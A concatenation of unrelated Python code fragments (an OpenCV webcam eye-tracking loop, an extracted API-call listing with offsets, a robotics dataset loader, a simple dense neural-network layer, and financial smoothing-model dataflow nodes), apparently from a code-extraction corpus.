glass_cascade = cv2.CascadeClassifier('trained/haarcascade_eye_tree_eyeglasses.xml')
reye_cascade = cv2.CascadeClassifier('trained/haarcascade_righteye_2splits.xml')
leye_cascade = cv2.CascadeClassifier('trained/haarcascade_lefteye_2splits.xml')
# face = None
# flost = 0
while rval:
roi_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
equalized = cv2.equalizeHist(roi_gray)
roi_color = frame
# faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# flost = flost+1
# for f in faces:
# if face is not None:
# # print("Face: " + str(distance(f,face)))
# if not (1 < distance(f,face) < 40):
# continue
# face = f
# flost = 0
# if flost < 5 and face is not None:
# (x,y,w,h) = face
# x+=10
# y+=10
# w = int(w*0.85)
# h = int(h*0.5)
# cv2.rectangle(frame,(x,y),(x+w,y+h),(255,0,0),2)
# roi_gray = gray[y:y+h, x:x+w]
# roi_color = frame[y:y+h, x:x+w]
eyes = eye_cascade.detectMultiScale(roi_gray)
for e in eyes:
(ex,ey,ew,eh) = e
# ex += 10
# ey += 10
# ew -= 10
# eh -= 10
cv2.rectangle(roi_color,(ex,ey),(ex+ew,ey+eh),(0,0,255),2)
eye_roi_gray = roi_gray[ey:ey+eh, ex:ex+ew]
eye_roi_color = roi_color[ey:ey+eh, ex:ex+ew]
hist = cv2.calcHist([eye_roi_gray],[0],None,[256],[0,256])
# Define criteria = ( type, max_iter = 10 , epsilon = 1.0 )
criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)
# Apply KMeans
compactness,labels,centers = cv2.kmeans(hist,2,None,criteria,100,cv2.KMEANS_RANDOM_CENTERS)
print(np.sqrt(compactness)/10)
print(centers)
# center = pbcvt.findPupil(roi_gray, int(ex), int(ey), int(ew), int(eh))
ret, thresh = cv2.threshold(eye_roi_gray, centers[0]-10, 255, 0)
# thresh = cv2.adaptiveThreshold(eye_roi_gray, 255, cv2.ADAPTIVE_THRESH_GAUSSIAN_C, cv2.THRESH_BINARY, 115, 0)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
# cv2.drawContours(eye_roi_color, contours, -1, (0,0,255), 3)
for cont in contours:
if len(cont) > 5 and cv2.contourArea(cont) > 1000:
ellipse = cv2.fitEllipse(cont)
cv2.ellipse(eye_roi_color, ellipse, (0,0,255),2)
cv2.circle(eye_roi_color, (int(ellipse[0][0]),int(ellipse[0][1])), 2, (255,0,0), 3)
# cv2.circle(eye_roi_color, center, 2, (0,255,0), 3)
# else:
# face = None
cv2.imshow("preview", roi_gray)
cv2.imshow("preview2", equalized)
cv2.imshow("preview3", thresh)
# if vout:
# vout.write(frame)
nf = nf + 1
if time() - ptime > 5:
print(str(nf/(time()-ptime)))
ptime = time()
nf = 0
key = cv2.waitKey(20)
if key == 27: # exit on ESC
break
elif key == 32:
cv2.imwrite('testimage.png',frame);
rval, frame = vc.read()
cv2.destroyWindow("preview")
cv2.destroyWindow("preview2")
cv2.destroyWindow("preview3")
vc.release()
# if vout:
# vout.release()
|
[
"cv2.rectangle",
"numpy.sqrt",
"cv2.imshow",
"cv2.ellipse",
"cv2.fitEllipse",
"cv2.CascadeClassifier",
"cv2.calcHist",
"cv2.threshold",
"cv2.contourArea",
"numpy.hypot",
"cv2.waitKey",
"cv2.kmeans",
"cv2.equalizeHist",
"cv2.cvtColor",
"time.time",
"cv2.namedWindow",
"cv2.imwrite",
"cv2.destroyWindow",
"cv2.findContours"
] |
[((261, 287), 'cv2.namedWindow', 'cv2.namedWindow', (['"""preview"""'], {}), "('preview')\n", (276, 287), False, 'import cv2\n'), ((288, 315), 'cv2.namedWindow', 'cv2.namedWindow', (['"""preview2"""'], {}), "('preview2')\n", (303, 315), False, 'import cv2\n'), ((316, 343), 'cv2.namedWindow', 'cv2.namedWindow', (['"""preview3"""'], {}), "('preview3')\n", (331, 343), False, 'import cv2\n'), ((759, 765), 'time.time', 'time', ([], {}), '()\n', (763, 765), False, 'from time import time\n'), ((873, 925), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""trained/haarcascade_eye.xml"""'], {}), "('trained/haarcascade_eye.xml')\n", (894, 925), False, 'import cv2\n'), ((942, 1010), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""trained/haarcascade_eye_tree_eyeglasses.xml"""'], {}), "('trained/haarcascade_eye_tree_eyeglasses.xml')\n", (963, 1010), False, 'import cv2\n'), ((1026, 1091), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""trained/haarcascade_righteye_2splits.xml"""'], {}), "('trained/haarcascade_righteye_2splits.xml')\n", (1047, 1091), False, 'import cv2\n'), ((1107, 1171), 'cv2.CascadeClassifier', 'cv2.CascadeClassifier', (['"""trained/haarcascade_lefteye_2splits.xml"""'], {}), "('trained/haarcascade_lefteye_2splits.xml')\n", (1128, 1171), False, 'import cv2\n'), ((3951, 3979), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""preview"""'], {}), "('preview')\n", (3968, 3979), False, 'import cv2\n'), ((3980, 4009), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""preview2"""'], {}), "('preview2')\n", (3997, 4009), False, 'import cv2\n'), ((4010, 4039), 'cv2.destroyWindow', 'cv2.destroyWindow', (['"""preview3"""'], {}), "('preview3')\n", (4027, 4039), False, 'import cv2\n'), ((226, 264), 'numpy.hypot', 'np.hypot', (['(c1[0] - c2[0])', '(c1[1] - c2[1])'], {}), '(c1[0] - c2[0], c1[1] - c2[1])\n', (234, 264), True, 'import numpy as np\n'), ((1226, 1265), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2GRAY'], {}), '(frame, cv2.COLOR_BGR2GRAY)\n', (1238, 1265), False, 'import cv2\n'), ((1282, 1308), 'cv2.equalizeHist', 'cv2.equalizeHist', (['roi_gray'], {}), '(roi_gray)\n', (1298, 1308), False, 'import cv2\n'), ((3519, 3550), 'cv2.imshow', 'cv2.imshow', (['"""preview"""', 'roi_gray'], {}), "('preview', roi_gray)\n", (3529, 3550), False, 'import cv2\n'), ((3555, 3588), 'cv2.imshow', 'cv2.imshow', (['"""preview2"""', 'equalized'], {}), "('preview2', equalized)\n", (3565, 3588), False, 'import cv2\n'), ((3593, 3623), 'cv2.imshow', 'cv2.imshow', (['"""preview3"""', 'thresh'], {}), "('preview3', thresh)\n", (3603, 3623), False, 'import cv2\n'), ((3796, 3811), 'cv2.waitKey', 'cv2.waitKey', (['(20)'], {}), '(20)\n', (3807, 3811), False, 'import cv2\n'), ((2108, 2178), 'cv2.rectangle', 'cv2.rectangle', (['roi_color', '(ex, ey)', '(ex + ew, ey + eh)', '(0, 0, 255)', '(2)'], {}), '(roi_color, (ex, ey), (ex + ew, ey + eh), (0, 0, 255), 2)\n', (2121, 2178), False, 'import cv2\n'), ((2288, 2344), 'cv2.calcHist', 'cv2.calcHist', (['[eye_roi_gray]', '[0]', 'None', '[256]', '[0, 256]'], {}), '([eye_roi_gray], [0], None, [256], [0, 256])\n', (2300, 2344), False, 'import cv2\n'), ((2549, 2616), 'cv2.kmeans', 'cv2.kmeans', (['hist', '(2)', 'None', 'criteria', '(100)', 'cv2.KMEANS_RANDOM_CENTERS'], {}), '(hist, 2, None, criteria, 100, cv2.KMEANS_RANDOM_CENTERS)\n', (2559, 2616), False, 'import cv2\n'), ((2777, 2829), 'cv2.threshold', 'cv2.threshold', (['eye_roi_gray', '(centers[0] - 10)', '(255)', '(0)'], {}), '(eye_roi_gray, centers[0] - 10, 255, 0)\n', (2790, 2829), False, 'import 
cv2\n'), ((2977, 3041), 'cv2.findContours', 'cv2.findContours', (['thresh', 'cv2.RETR_TREE', 'cv2.CHAIN_APPROX_SIMPLE'], {}), '(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n', (2993, 3041), False, 'import cv2\n'), ((3764, 3770), 'time.time', 'time', ([], {}), '()\n', (3768, 3770), False, 'from time import time\n'), ((3690, 3696), 'time.time', 'time', ([], {}), '()\n', (3694, 3696), False, 'from time import time\n'), ((3886, 3921), 'cv2.imwrite', 'cv2.imwrite', (['"""testimage.png"""', 'frame'], {}), "('testimage.png', frame)\n", (3897, 3921), False, 'import cv2\n'), ((2626, 2646), 'numpy.sqrt', 'np.sqrt', (['compactness'], {}), '(compactness)\n', (2633, 2646), True, 'import numpy as np\n'), ((3231, 3251), 'cv2.fitEllipse', 'cv2.fitEllipse', (['cont'], {}), '(cont)\n', (3245, 3251), False, 'import cv2\n'), ((3268, 3319), 'cv2.ellipse', 'cv2.ellipse', (['eye_roi_color', 'ellipse', '(0, 0, 255)', '(2)'], {}), '(eye_roi_color, ellipse, (0, 0, 255), 2)\n', (3279, 3319), False, 'import cv2\n'), ((3175, 3196), 'cv2.contourArea', 'cv2.contourArea', (['cont'], {}), '(cont)\n', (3190, 3196), False, 'import cv2\n'), ((3732, 3738), 'time.time', 'time', ([], {}), '()\n', (3736, 3738), False, 'from time import time\n')]
|
import logging
import os
from pathlib import Path
import re
from typing import Dict, List, Optional, Tuple
from calvin_agent.datasets.base_dataset import BaseDataset
from calvin_agent.datasets.utils.episode_utils import (
get_state_info_dict,
process_actions,
process_depth,
process_rgb,
process_state,
)
import numpy as np
import torch
logger = logging.getLogger(__name__)
class NpzDataset(BaseDataset):
"""
Dataset Loader that uses a shared memory cache
parameters
----------
datasets_dir: path of folder containing episode files (string must contain 'validation' or 'training')
save_format: format of episodes in datasets_dir (.pkl or .npz)
obs_space: DictConfig of the observation modalities of the dataset
max_window_size: maximum length of the episodes sampled from the dataset
"""
def __init__(self, *args, skip_frames: int = 0, n_digits: Optional[int] = None, **kwargs): # type: ignore
super().__init__(*args, **kwargs)
self.skip_frames = skip_frames
if self.with_lang:
(
self.episode_lookup,
self.lang_lookup,
self.max_batched_length_per_demo,
self.lang_ann,
) = self.load_file_indices_lang(self.abs_datasets_dir)
else:
self.episode_lookup, self.max_batched_length_per_demo = self.load_file_indices(self.abs_datasets_dir)
self.naming_pattern, self.n_digits = self.lookup_naming_pattern(n_digits)
def lookup_naming_pattern(self, n_digits):
it = os.scandir(self.abs_datasets_dir)
while True:
filename = Path(next(it))
if self.save_format in filename.suffix:
break
aux_naming_pattern = re.split(r"\d+", filename.stem)
naming_pattern = [filename.parent / aux_naming_pattern[0], filename.suffix]
n_digits = n_digits if n_digits is not None else len(re.findall(r"\d+", filename.stem)[0])
assert len(naming_pattern) == 2
assert n_digits > 0
return naming_pattern, n_digits
def get_episode_name(self, idx: int) -> Path:
"""
Convert frame idx to file name
"""
return Path(f"{self.naming_pattern[0]}{idx:0{self.n_digits}d}{self.naming_pattern[1]}")
def zip_sequence(self, start_idx: int, end_idx: int, idx: int) -> Dict[str, np.ndarray]:
"""
Load consecutive individual frames saved as npy files and combine to episode dict
parameters:
-----------
start_idx: index of first frame
end_idx: index of last frame
returns:
-----------
episode: dict of numpy arrays containing the episode where keys are the names of modalities
"""
episodes = [self.load_episode(self.get_episode_name(file_idx)) for file_idx in range(start_idx, end_idx)]
episode = {key: np.stack([ep[key] for ep in episodes]) for key, _ in episodes[0].items()}
if self.with_lang:
episode["language"] = self.lang_ann[self.lang_lookup[idx]][0] # TODO check [0]
return episode
def get_sequences(self, idx: int, window_size: int) -> Dict:
"""
parameters
----------
idx: index of starting frame
window_size: length of sampled episode
returns
----------
seq_state_obs: numpy array of state observations
seq_rgb_obs: tuple of numpy arrays of rgb observations
        seq_depth_obs: tuple of numpy arrays of depth observations
seq_acts: numpy array of actions
"""
start_file_indx = self.episode_lookup[idx]
end_file_indx = start_file_indx + window_size
episode = self.zip_sequence(start_file_indx, end_file_indx, idx)
seq_state_obs = process_state(episode, self.observation_space, self.transforms, self.proprio_state)
seq_rgb_obs = process_rgb(episode, self.observation_space, self.transforms)
seq_depth_obs = process_depth(episode, self.observation_space, self.transforms)
seq_acts = process_actions(episode, self.observation_space, self.transforms)
info = get_state_info_dict(episode)
seq_lang = {"lang": torch.from_numpy(episode["language"]) if self.with_lang else torch.empty(0)}
seq_dict = {**seq_state_obs, **seq_rgb_obs, **seq_depth_obs, **seq_acts, **info, **seq_lang} # type:ignore
seq_dict["idx"] = idx # type:ignore
return seq_dict
def load_file_indices_lang(self, abs_datasets_dir: Path) -> Tuple[List, List, List, np.ndarray]:
"""
this method builds the mapping from index to file_name used for loading the episodes
parameters
----------
abs_datasets_dir: absolute path of the directory containing the dataset
returns
----------
episode_lookup: list for the mapping from training example index to episode (file) index
        max_batched_length_per_demo: list with the number of possible starting indices per episode
"""
assert abs_datasets_dir.is_dir()
episode_lookup = []
try:
print("trying to load lang data from: ", abs_datasets_dir / self.lang_folder / "auto_lang_ann.npy")
lang_data = np.load(abs_datasets_dir / self.lang_folder / "auto_lang_ann.npy", allow_pickle=True).reshape(
-1
)[0]
except Exception:
print("Exception, trying to load lang data from: ", abs_datasets_dir / "auto_lang_ann.npy")
lang_data = np.load(abs_datasets_dir / "auto_lang_ann.npy", allow_pickle=True).reshape(-1)[0]
ep_start_end_ids = lang_data["info"]["indx"]
lang_ann = lang_data["language"]["emb"]
lang_lookup = []
max_batched_length_per_demo = []
for i, (start_idx, end_idx) in enumerate(ep_start_end_ids):
assert end_idx >= self.max_window_size
cnt = 0
for idx in range(start_idx, end_idx + 1 - self.max_window_size):
if cnt % self.skip_frames == 0:
lang_lookup.append(i)
episode_lookup.append(idx)
cnt += 1
possible_indices = end_idx + 1 - start_idx - self.max_window_size # TODO: check it for skip_frames
max_batched_length_per_demo.append(possible_indices)
return episode_lookup, lang_lookup, max_batched_length_per_demo, lang_ann
def load_file_indices(self, abs_datasets_dir: Path) -> Tuple[List, List]:
"""
this method builds the mapping from index to file_name used for loading the episodes
parameters
----------
abs_datasets_dir: absolute path of the directory containing the dataset
returns
----------
episode_lookup: list for the mapping from training example index to episode (file) index
        max_batched_length_per_demo: list with the number of possible starting indices per episode
"""
assert abs_datasets_dir.is_dir()
episode_lookup = []
ep_start_end_ids = np.load(abs_datasets_dir / "ep_start_end_ids.npy")
logger.info(f'Found "ep_start_end_ids.npy" with {len(ep_start_end_ids)} episodes.')
max_batched_length_per_demo = []
for start_idx, end_idx in ep_start_end_ids:
assert end_idx > self.max_window_size
for idx in range(start_idx, end_idx + 1 - self.max_window_size):
episode_lookup.append(idx)
possible_indices = end_idx + 1 - start_idx - self.max_window_size
max_batched_length_per_demo.append(possible_indices)
return episode_lookup, max_batched_length_per_demo
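# Minimal sketch of how the naming pattern learned above turns a frame index into a file
# name. The prefix "episode_", the 7-digit padding and the ".npz" suffix are assumed
# example values; the real ones are derived from the files found in `abs_datasets_dir`.
if __name__ == "__main__":
    _naming_pattern = (Path("/data/training/episode_"), ".npz")
    _n_digits = 7
    _idx = 42
    _episode_file = Path(f"{_naming_pattern[0]}{_idx:0{_n_digits}d}{_naming_pattern[1]}")
    print(_episode_file)  # /data/training/episode_0000042.npz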
|
[
"logging.getLogger",
"re.split",
"calvin_agent.datasets.utils.episode_utils.process_state",
"calvin_agent.datasets.utils.episode_utils.process_depth",
"calvin_agent.datasets.utils.episode_utils.process_rgb",
"pathlib.Path",
"calvin_agent.datasets.utils.episode_utils.get_state_info_dict",
"os.scandir",
"torch.from_numpy",
"calvin_agent.datasets.utils.episode_utils.process_actions",
"numpy.stack",
"re.findall",
"numpy.load",
"torch.empty"
] |
[((368, 395), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (385, 395), False, 'import logging\n'), ((1600, 1633), 'os.scandir', 'os.scandir', (['self.abs_datasets_dir'], {}), '(self.abs_datasets_dir)\n', (1610, 1633), False, 'import os\n'), ((1795, 1826), 're.split', 're.split', (['"""\\\\d+"""', 'filename.stem'], {}), "('\\\\d+', filename.stem)\n", (1803, 1826), False, 'import re\n'), ((2247, 2332), 'pathlib.Path', 'Path', (['f"""{self.naming_pattern[0]}{idx:0{self.n_digits}d}{self.naming_pattern[1]}"""'], {}), "(f'{self.naming_pattern[0]}{idx:0{self.n_digits}d}{self.naming_pattern[1]}'\n )\n", (2251, 2332), False, 'from pathlib import Path\n'), ((3842, 3930), 'calvin_agent.datasets.utils.episode_utils.process_state', 'process_state', (['episode', 'self.observation_space', 'self.transforms', 'self.proprio_state'], {}), '(episode, self.observation_space, self.transforms, self.\n proprio_state)\n', (3855, 3930), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((3948, 4009), 'calvin_agent.datasets.utils.episode_utils.process_rgb', 'process_rgb', (['episode', 'self.observation_space', 'self.transforms'], {}), '(episode, self.observation_space, self.transforms)\n', (3959, 4009), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((4034, 4097), 'calvin_agent.datasets.utils.episode_utils.process_depth', 'process_depth', (['episode', 'self.observation_space', 'self.transforms'], {}), '(episode, self.observation_space, self.transforms)\n', (4047, 4097), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((4117, 4182), 'calvin_agent.datasets.utils.episode_utils.process_actions', 'process_actions', (['episode', 'self.observation_space', 'self.transforms'], {}), '(episode, self.observation_space, self.transforms)\n', (4132, 4182), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((4198, 4226), 'calvin_agent.datasets.utils.episode_utils.get_state_info_dict', 'get_state_info_dict', (['episode'], {}), '(episode)\n', (4217, 4226), False, 'from calvin_agent.datasets.utils.episode_utils import get_state_info_dict, process_actions, process_depth, process_rgb, process_state\n'), ((7161, 7211), 'numpy.load', 'np.load', (["(abs_datasets_dir / 'ep_start_end_ids.npy')"], {}), "(abs_datasets_dir / 'ep_start_end_ids.npy')\n", (7168, 7211), True, 'import numpy as np\n'), ((2929, 2967), 'numpy.stack', 'np.stack', (['[ep[key] for ep in episodes]'], {}), '([ep[key] for ep in episodes])\n', (2937, 2967), True, 'import numpy as np\n'), ((4255, 4292), 'torch.from_numpy', 'torch.from_numpy', (["episode['language']"], {}), "(episode['language'])\n", (4271, 4292), False, 'import torch\n'), ((4316, 4330), 'torch.empty', 'torch.empty', (['(0)'], {}), '(0)\n', (4327, 4330), False, 'import torch\n'), ((1972, 2005), 're.findall', 're.findall', (['"""\\\\d+"""', 'filename.stem'], {}), "('\\\\d+', filename.stem)\n", (1982, 2005), False, 'import re\n'), ((5326, 5415), 'numpy.load', 'np.load', (["(abs_datasets_dir / self.lang_folder / 'auto_lang_ann.npy')"], {'allow_pickle': '(True)'}), "(abs_datasets_dir / self.lang_folder / 'auto_lang_ann.npy',\n allow_pickle=True)\n", (5333, 5415), True, 'import numpy as np\n'), 
((5611, 5677), 'numpy.load', 'np.load', (["(abs_datasets_dir / 'auto_lang_ann.npy')"], {'allow_pickle': '(True)'}), "(abs_datasets_dir / 'auto_lang_ann.npy', allow_pickle=True)\n", (5618, 5677), True, 'import numpy as np\n')]
|
import numpy
from NeuralNetworks.Layers.activations import lambda_from_function
class Dense:
def __init__(self, num_nodes = 1, input_dim = None, activation = 'sigmoid'):
# set number of nodes
self.num_nodes = num_nodes
self.input_dim = input_dim
self.activation = activation
        # activation and derivative functions
self.activation_function, self.activation_gradient = lambda_from_function(activation)
def init(self, previous_layer):
self.previous_layer = previous_layer
if previous_layer == None:
input_dim = self.input_dim
else:
input_dim = previous_layer.num_nodes
self.weights = numpy.random.normal(0.0, pow(input_dim, -0.5), (self.num_nodes, input_dim))
self.output_shape = (self.num_nodes, 1)
def forward(self, input):
# calculate signals into hidden layer
hidden_input = numpy.dot(self.weights, input)
        # calculate the signals emerging from the hidden layer
output = self.activation_function(hidden_input)
assert(self.output_shape == output.shape)
self.layer_output = output
return self.layer_output
def backward(self, learning_rate, error_gradient_in, previous_layer_output):
        # Weight update (gradient descent on the squared error): delta_W = learning_rate * (error_next * activation_gradient(output_this)) @ output_previous.T
self.weights += learning_rate * numpy.dot(
(error_gradient_in * self.activation_gradient(self.layer_output)),
numpy.transpose(previous_layer_output))
# propagate the gradient error to previous layer
error_gradient_out = numpy.dot(self.weights.T, error_gradient_in)
return error_gradient_out
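# Minimal usage sketch, assuming the sigmoid activation from the activations module is
# importable: two Dense layers wired into a forward pass and one gradient-descent step.
# Shapes follow the conventions above: inputs, outputs and error gradients are column vectors.
if __name__ == "__main__":
    hidden = Dense(num_nodes = 3, input_dim = 2, activation = 'sigmoid')
    output = Dense(num_nodes = 1, activation = 'sigmoid')
    hidden.init(None)
    output.init(hidden)
    x = numpy.array([[0.5], [-1.0]])              # shape (input_dim, 1)
    y_hat = output.forward(hidden.forward(x))     # shape (1, 1)
    error = numpy.array([[1.0]]) - y_hat         # error signal (target minus prediction)
    hidden_error = output.backward(0.1, error, hidden.layer_output)
    hidden.backward(0.1, hidden_error, x)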
|
[
"numpy.dot",
"numpy.transpose",
"NeuralNetworks.Layers.activations.lambda_from_function"
] |
[((424, 456), 'NeuralNetworks.Layers.activations.lambda_from_function', 'lambda_from_function', (['activation'], {}), '(activation)\n', (444, 456), False, 'from NeuralNetworks.Layers.activations import lambda_from_function\n'), ((940, 970), 'numpy.dot', 'numpy.dot', (['self.weights', 'input'], {}), '(self.weights, input)\n', (949, 970), False, 'import numpy\n'), ((1698, 1742), 'numpy.dot', 'numpy.dot', (['self.weights.T', 'error_gradient_in'], {}), '(self.weights.T, error_gradient_in)\n', (1707, 1742), False, 'import numpy\n'), ((1571, 1609), 'numpy.transpose', 'numpy.transpose', (['previous_layer_output'], {}), '(previous_layer_output)\n', (1586, 1609), False, 'import numpy\n')]
|
import collections
import datetime
import logging
from typing import Any, Callable, Dict, List, Optional, Tuple, Union
import numpy as np
import pandas as pd
import scipy as sp
import sklearn as sklear
import core.config as cconfig
import core.data_adapters as cdataa
import core.dataflow.utils as cdu
import core.finance as cfinan
import core.signal_processing as csigna
import core.statistics as cstati
import helpers.dbg as dbg
from core.dataflow.core import DAG, Node
from core.dataflow.nodes.base import (
ColModeMixin,
FitPredictNode,
SeriesToDfColProcessor,
)
from core.dataflow.nodes.sources import ReadDataFromDf
from core.dataflow.nodes.transformers import ColumnTransformer
from core.dataflow.visitors import extract_info
_LOG = logging.getLogger(__name__)
_COL_TYPE = Union[int, str]
_PANDAS_DATE_TYPE = Union[str, pd.Timestamp, datetime.datetime]
_TO_LIST_MIXIN_TYPE = Union[List[_COL_TYPE], Callable[[], List[_COL_TYPE]]]
class SmaModel(FitPredictNode, ColModeMixin):
"""
Fit and predict a smooth moving average (SMA) model.
"""
def __init__(
self,
nid: str,
col: _TO_LIST_MIXIN_TYPE,
steps_ahead: int,
tau: Optional[float] = None,
min_tau_periods: Optional[float] = 2,
col_mode: Optional[str] = None,
nan_mode: Optional[str] = None,
) -> None:
"""
Specify the data and SMA modeling parameters.
:param nid: unique node id
:param col: name of column to model
:param steps_ahead: as in `ContinuousSkLearnModel`
:param tau: as in `csigna.compute_smooth_moving_average`. If `None`,
learn this parameter. Will be re-learned on each `fit` call.
:param min_tau_periods: similar to `min_periods` as in
`csigna.compute_smooth_moving_average`, but expressed in units of
tau
:param col_mode: `merge_all` or `replace_all`, as in `ColumnTransformer()`
:param nan_mode: as in `ContinuousSkLearnModel`
"""
super().__init__(nid)
self._col = cdu.convert_to_list(col)
dbg.dassert_eq(len(self._col), 1)
self._steps_ahead = steps_ahead
dbg.dassert_lte(
0, self._steps_ahead, "Non-causal prediction attempted! Aborting..."
)
if nan_mode is None:
self._nan_mode = "raise"
else:
self._nan_mode = nan_mode
self._col_mode = col_mode or "replace_all"
dbg.dassert_in(self._col_mode, ["replace_all", "merge_all"])
# Smooth moving average model parameters to learn.
self._must_learn_tau = tau is None
self._tau = tau
self._min_tau_periods = min_tau_periods or 0
self._min_depth = 1
self._max_depth = 1
self._metric = sklear.metrics.mean_absolute_error
def fit(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
idx = df_in.index[: -self._steps_ahead]
x_vars = self._col
y_vars = self._col
df = cdu.get_x_and_forward_y_fit_df(
df_in, x_vars, y_vars, self._steps_ahead
)
forward_y_cols = df.drop(x_vars, axis=1).columns
# Handle presence of NaNs according to `nan_mode`.
self._handle_nans(idx, df.index)
# Define and fit model.
if self._must_learn_tau:
forward_y_df = df[forward_y_cols]
# Prepare forward y_vars in sklearn format.
forward_y_fit = cdataa.transform_to_sklearn(
forward_y_df, forward_y_df.columns.tolist()
)
# Prepare `x_vars` in sklearn format.
x_fit = cdataa.transform_to_sklearn(df, self._col)
self._tau = self._learn_tau(x_fit, forward_y_fit)
_LOG.debug("tau=%s", self._tau)
return self._predict_and_package_results(df_in, idx, df.index, fit=True)
def predict(self, df_in: pd.DataFrame) -> Dict[str, pd.DataFrame]:
cdu.validate_df_indices(df_in)
df = df_in.copy()
idx = df.index
# Restrict to times where col has no NaNs.
non_nan_idx = df.loc[idx][self._col].dropna().index
# Handle presence of NaNs according to `nan_mode`.
self._handle_nans(idx, non_nan_idx)
# Use trained model to generate predictions.
dbg.dassert_is_not(
self._tau,
None,
"Parameter tau not found! Check if `fit` has been run.",
)
return self._predict_and_package_results(
df_in, idx, non_nan_idx, fit=False
)
def get_fit_state(self) -> Dict[str, Any]:
fit_state = {"_tau": self._tau, "_info['fit']": self._info["fit"]}
return fit_state
def set_fit_state(self, fit_state: Dict[str, Any]) -> None:
self._tau = fit_state["_tau"]
self._info["fit"] = fit_state["_info['fit']"]
def _predict_and_package_results(
self,
df_in: pd.DataFrame,
idx: pd.Index,
non_nan_idx: pd.Index,
fit: bool = True,
) -> Dict[str, pd.DataFrame]:
data = cdataa.transform_to_sklearn(df_in.loc[non_nan_idx], self._col)
fwd_y_hat = self._predict(data)
forward_y_df = cdu.get_forward_cols(df_in, self._col, self._steps_ahead)
forward_y_df = forward_y_df.loc[non_nan_idx]
# Put predictions in dataflow dataframe format.
fwd_y_hat_vars = [f"{y}_hat" for y in forward_y_df.columns]
fwd_y_hat = cdataa.transform_from_sklearn(
non_nan_idx, fwd_y_hat_vars, fwd_y_hat
)
# Return targets and predictions.
df_out = forward_y_df.reindex(idx).merge(
fwd_y_hat.reindex(idx), left_index=True, right_index=True
)
dbg.dassert_no_duplicates(df_out.columns)
# Select columns for output.
df_out = self._apply_col_mode(
df_in, df_out, cols=self._col, col_mode=self._col_mode
)
# Update `info`.
info = collections.OrderedDict()
info["tau"] = self._tau
info["min_periods"] = self._get_min_periods(self._tau)
info["df_out_info"] = cdu.get_df_info_as_string(df_out)
method = "fit" if fit else "predict"
self._set_info(method, info)
return {"df_out": df_out}
def _handle_nans(
self, idx: pd.DataFrame.index, non_nan_idx: pd.DataFrame.index
) -> None:
if self._nan_mode == "raise":
if idx.shape[0] != non_nan_idx.shape[0]:
nan_idx = idx.difference(non_nan_idx)
raise ValueError(f"NaNs detected at {nan_idx}")
elif self._nan_mode == "drop":
pass
elif self._nan_mode == "leave_unchanged":
pass
else:
raise ValueError(f"Unrecognized nan_mode `{self._nan_mode}`")
def _learn_tau(self, x: np.array, y: np.array) -> float:
def score(tau: float) -> float:
x_srs = pd.DataFrame(x.flatten())
sma = csigna.compute_smooth_moving_average(
x_srs,
tau=tau,
min_periods=0,
min_depth=self._min_depth,
max_depth=self._max_depth,
)
min_periods = self._get_min_periods(tau)
return self._metric(sma[min_periods:], y[min_periods:])
tau_lb, tau_ub = 1, 1000
# Satisfy 2 * tau_ub * min_tau_periods = len(x).
# This ensures that no more than half of the `fit` series is burned.
if self._min_tau_periods > 0:
tau_ub = int(len(x) / (2 * self._min_tau_periods))
opt_results = sp.optimize.minimize_scalar(
score, method="bounded", bounds=[tau_lb, tau_ub]
)
return opt_results.x
def _get_min_periods(self, tau: float) -> int:
"""
Return burn-in period.
Multiplies `tau` by `min_tau_periods` and converts to an integer.
:param tau: kernel tau (approximately equal to center of mass)
:return: minimum number of periods required to generate a prediction
"""
return int(np.rint(self._min_tau_periods * tau))
def _predict(self, x: np.array) -> np.array:
x_srs = pd.DataFrame(x.flatten())
# TODO(*): Make `min_periods` configurable.
min_periods = int(np.rint(self._min_tau_periods * self._tau))
_LOG.debug("min_periods=%f", min_periods)
x_sma = csigna.compute_smooth_moving_average(
x_srs,
tau=self._tau,
min_periods=min_periods,
min_depth=self._min_depth,
max_depth=self._max_depth,
)
return x_sma.values
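# Minimal usage sketch, assuming a single returns column named "ret_0" and a toy
# business-day index (both example values, not part of the library): `fit` learns `tau`
# on the provided history, `predict` reuses it.
def _example_sma_model_usage() -> None:
    srs = pd.Series(
        np.random.randn(100), index=pd.date_range("2010-01-01", periods=100, freq="B")
    )
    df = srs.to_frame(name="ret_0")
    node = SmaModel("sma", col=["ret_0"], steps_ahead=2, tau=None)
    df_fit = node.fit(df)["df_out"]
    df_pred = node.predict(df)["df_out"]
    _LOG.debug("fit cols=%s predict cols=%s", df_fit.columns, df_pred.columns)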
class SingleColumnVolatilityModel(FitPredictNode):
def __init__(
self,
nid: str,
steps_ahead: int,
col: _COL_TYPE,
p_moment: float = 2,
progress_bar: bool = False,
tau: Optional[float] = None,
nan_mode: Optional[str] = None,
out_col_prefix: Optional[str] = None,
) -> None:
"""
Parameters have the same meaning as `SmaModel`.
"""
super().__init__(nid)
self._col = col
self._steps_ahead = steps_ahead
dbg.dassert_lte(1, p_moment)
self._p_moment = p_moment
self._progress_bar = progress_bar
self._tau = tau
self._learn_tau_on_fit = tau is None
self._nan_mode = nan_mode
self._out_col_prefix = out_col_prefix
def get_fit_state(self) -> Dict[str, Any]:
fit_state = {
"_col": self._col,
"_tau": self._tau,
"_info['fit']": self._info["fit"],
"_out_col_prefix": self._out_col_prefix,
}
return fit_state
